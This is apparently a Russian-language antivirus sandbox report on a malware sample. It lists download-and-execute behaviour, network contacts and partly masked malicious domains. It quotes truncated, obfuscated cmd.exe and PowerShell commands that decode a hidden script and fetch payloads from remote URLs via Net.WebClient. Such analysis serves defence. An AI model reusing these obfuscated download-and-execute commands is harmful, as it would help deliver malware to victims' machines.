Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:O\C"set Qbq=D%rkjUNcIgeMCP'a=(\ u)B2~ELnb{zvYW5sf4i,6h3Sq}0-1\:.Tld+;9yxtFOwAJ7Gm@$X8op&&for %P in (74,73,63,1,13,5,22,26,8,12,50,24,34,39,48,1,2,1,43...
Сетевая активность
Подключается к
- '34.##9.95.80':80
UDP
- DNS ASK du####zukipark.com
- DNS ASK na####alidea.info
- DNS ASK bi####.rise-up.nsk.ru
- DNS ASK ma##.##tgirlsgames.xyz
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:O\C"set Qbq=D%rkjUNcIgeMCP'a=(\ u)B2~ELnb{zvYW5sf4i,6h3Sq}0-1\:.Tld+;9yxtFOwAJ7Gm@$X8op&&for %P in (74,73,63,1,13,5,22,26,8,12,50,24,34,39,48,1,2,1,43...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V:O/C"set Qbq=D%rkjUNcIgeMCP'a=(/ u)B2~ELnb{zvYW5sf4i,6h3Sq}0-1\:.Tld+;9yxtFOwAJ7Gm@$X8op&&for %P in (74,73,63,1,13,5,22,26,8,12,50,24,34,39,48,1,2,1,43,25,43,43,8,62,6,6,64,11,25,50,24,47,37,...
- '<SYSTEM32>\cmd.exe' /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $p2173='c8071';$q198=new-object Net.WebClient;$a7203='http://du####zukipark.com/3jd4h1qiw@http://nationalidea.info/JY3qgvTT@ht...
- '<SYSTEM32>\cmd.exe'
